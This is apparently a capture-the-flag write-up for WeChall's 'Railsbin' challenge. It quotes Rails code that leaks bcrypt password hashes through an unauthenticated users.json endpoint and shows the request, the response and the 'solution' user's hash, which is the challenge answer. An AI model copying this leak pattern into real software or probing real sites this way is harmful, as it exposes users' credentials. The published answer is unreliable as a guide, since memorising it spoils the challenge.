WeChall - Railsbin

Challenge

Railsbin (Exploit) — score 3, by gizmore.

The project named "railsbin" is open source, but has a few security problems. Can you exploit the demo site? The solution is the password hash of user solution.

Railsbin 是一个开源 Ruby on Rails pastebin demo。源码在 gizmore/railsbin。目标是得到用户 solution 的 bcrypt password hash。

Solution

源码审计发现 UsersController#index 有一个漏洞:

1
2
3
4
5
# app/controllers/users_controller.rb:8
def index
@users = User.all
@users.map {|u| u.password = u.encrypted_password }
end

encrypted_password(bcrypt hash)复制到虚拟属性 password 上。JSON view 直接序列化暴露:

1
2
# app/views/users/index.json.jbuilder
json.extract! user, :id, :name, :email, :password

无需认证,直接请求:

1
GET https://railsbin.wechall.net/users.json

返回所有用户的完整 bcrypt hash,包括 solution 用户:

1
2
3
4
5
6
{
"id": 17,
"name": "solution",
"email": "solution@wechall.net",
"password": "$2a$10$44GwiA6ai0wxjzhFkeyjuO3kdVvmco8ReypH7H1tLsM2OrRFhe4CK"
}
$2a$10$44GwiA6ai0wxjzhFkeyjuO3kdVvmco8ReypH7H1tLsM2OrRFhe4CK